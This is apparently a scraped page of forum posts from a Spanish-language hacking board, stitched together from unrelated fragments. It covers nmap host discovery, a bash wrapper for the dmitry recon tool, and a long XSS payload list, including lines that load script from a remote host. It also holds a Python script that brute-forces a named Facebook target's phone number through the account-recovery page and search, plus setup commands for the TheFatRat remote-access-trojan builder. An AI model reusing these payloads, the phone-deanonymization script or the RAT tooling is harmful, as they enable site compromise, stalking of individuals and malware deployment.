No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
alguien tiene el pass?
There is no one more blind than he refuses to see.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
alguien tiene el pass?
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
Citar
nmap -sn -T4 -oA Discovery 192.168.1.0/24
CitarOptions explained:
-sn = "Ping scan"
-T4 = Throttle to aggressive
-oA <basename>= Output in all three formats (normal, XML, greppable)
CitarCódigo: bash root@kali:~/Tests/Results/nmap/recon/# ls
Discovery.gnmap Discovery.nmap Discovery.xml
Files explained:
.nmap = Normal output (what is printed to the screen)
.gnmap = Greppable output
.xml = XML output
CitarCódigo: bash grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > upHost.txt
Cut options explained:
-f = field number (in this case, field 2)
-d = delimiter (in this case, a space)
echo -e ".-=~=- .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(__ _)
( _ __) ____ _ _ __ ____ ____ _ _ ____ __ _ _ ____ ( _ __)
(__ ) ( \( \/ )( )(_ _)( _ \( \/ )/ ___) / \ ( \/ )( __) ( __)
( __) ) D (/ \/ \ )( )( ) / ) / \___ \( O )/ \/ \ ) _) ( _)
(_ ) (____/\_)(_/(__) (__) (__\_)(__/ (____/ \__/ \_)(_/(____) (__ _)
( _ __) by 0xb4dc0d3 ( _ __)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)
(__ _) (_____)
(_ ___) Usage: ./dmitrysome -winsepfb -t filename.txt (____ )
( _ __) ----------------------------------------------- (_____)
(__ _) -w ==> Whois lookup on the domain name of a host (__ __)
( _ __) -i ==> Whois lookup on the IP address of a host ( ____)
(_____) -n ==> Retrieve Netcraft information on a host (_ _ _)
(_ _) -s ==> Perform a search for possible subdomains (___ )
( _ _ ) -e ==> Perform a search for possible email address (__ _)
(__ ) -p ==> Perform a TCP port scan on a host (___ _)
(____ ) -f ==> Perform a TCP port scan on a host (filtered) (_____)
(__ ) -b ==> Read banners received from scanned ports (_____)
(_ ) -t ==> Set TTL in seconds scanning TCP ports (_ )
( ) (__ )
( _) /*/ Requires the -p flagged to be passed /*/ (_____)
( __) (_ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)"
echo -n "Insert options => "
read parameters
echo -n "Insert TTL => "
read ttl
echo "Running script ..."
while IFS='' read -r host || [[ -n "$host" ]]; do
gnome-terminal --tab -e "gnome-terminal --geometry=260x25-0+0 --tab -e 'dmitry -$parameters -t $ttl -o $host.txt $host'"
done < "$1"
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000
<x onxxx=1
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
<x 1='1'onxxx=1
<x 1="1"onxxx=1
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
<x%2F1=">%22OnXxx%3D1
param1=1<1¶m2=2<1¶m3=3<1
<svg/onload=location='javascript:alert(1)'>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
<svg/onload=location='javas'%2B'cript:'%2B'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()#
<svg onload=alert(tagName)>
<javascript onclick=alert(tagName)>click me!
<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>
'click me!</javascript:>#'-alert(1)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)
<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
"-alert(1)<javascript:" onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
"-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!
<alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>
<j 1="*/""-alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
*/"<j"-alert(1)<!– onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/"<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
<j onclick=location=innerHTML>javascript%26colon;alert(1)//
<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
Source-Breaking Injections
"onafterscriptexecute=alert(1) 1='
"onbeforescriptexecute=alert(1) 1='
<svg onload=setInterval(function(){d=document;
z=d.createElement("script");z.src="//HOST:PORT";
d.body.appendChild(z)},0)>
<svg onload=write(1)>
p='onload=alert(1)><svg/1='
p='>alert(1)</script><script/1='
p=*/alert(1)</script><script>/*
p=*/alert(1)">'onload="/*<svg/1='
p=`-alert(1)">'onload="`<svg/1='
p=*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
p=-alert(1)}//\
p=\&q=-alert(1)//
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 />
<animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
<math><!–" href=javascript:alert(1)//
" href=javascript:alert(1) <math><!–
lol video<!–"href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');
background-repeat:no-repeat –><math><!–
<svg><!–'-alert(1)-'
'-alert(1)-'<svg><!–
No tienes permitido ver enlaces. Registrate o Entra a tu cuentaNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Gracias por el aporte hay , version gnu/linux?
Enviado desde mi SM-G928T mediante Tapatalk
Podrias intentar correrlo con wine, aunque no creo que jale.
CitarListado de Herramientas
Information Gathering
✓ Amap
✓ Automater
✓ CaseFile
✓ arpscan
✓ dnmap
✓ Fierce
✓ GoLismero
✓ hping3
✓ Maltego Teeth
✓ masscan
✓ Nmap
✓ Zenmap
✓ know-scan
✓ Recon-ng
✓ theHarvester
✓ URLCrazy
Network Tools
✓ Autossh
✓ SET
✓ Exploit pack
✓ search-exploits
Forensics Tools
✓ pdf-parser
✓ pdfid
✓ peepdf
✓ OSXAuditor-master
✓ Binary Cookie reader
Web Applications
✓ Burp Suite
✓ nikto
✓ DirBuster
✓ fimap
✓ jSQL
✓ sqlmap
✓ Vega
✓ Wfuzz
✓ mitmproxy
✓ mitmdump
✓ zaproxy
✓ webscarab
✓ wapiti
✓ SQL injector
import urllib2
import re
import threading
import sys
manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
user = raw_input("Username: ")
a = urllib2.build_opener()
a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
a.addheaders.append(('Cookie',manual_cookie))
cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]
cc = raw_input("Country Code: ")
nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")
file_save = open('out.txt','a')
opener = urllib2.build_opener()
url = 'http://www.facebook.com/search/more?q=%2B'
zeroz = 0
manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
print "[+] Threads are Set To Default To 5\n[+] Bruting Started"
def brute(manual_cookie,number):
page = url + number
opener.addheaders.append(('Cookie', manual_cookie))
get = opener.open(page)
html = get.read()
acc = re.findall('<div class="_zs fwb" data-bt="{"ct":"title"}"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
accc = re.findall('<div class="_zs fwb" data-bt="{"ct":"title"}"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
if acc:
if re.findall(user, html):
print "\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n"
file_save.write("\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n\n\n")
print "Good Luck"
sys.exit()
else:
print "[+] " + acc[0] + " => +" + str(number)
file_save.write("[+] " + acc[0] + " => +" + str(number) + "\n")
elif accc:
if re.findall(user, html):
print "\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n"
file_save.write("\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n\n\n")
print "Good Luck"
sys.exit()
else:
print "[+] " + accc[0] + " => +" + str(number)
file_save.write("[+] " + accc[0] + " => +" + str(number) + "\n")
else:
print "[-] => +" + str(number)
while int(len(str(zeroz))) < int(nb_bt)+1:
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
t=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
to=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
tt=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
tth=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
tf=threading.Thread(target=brute,args=(manual_cookie,number,))
t.start()
to.start()
tt.start()
tth.start()
tf.start()
t.join()
to.join()
tt.join()
tth.join()
tf.join()
zeroz += 5
while 1:
break
file_save.close()
apt-get install mingw32
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
cd setup
bash setup.sh
chmod +x fatrat
./fatrat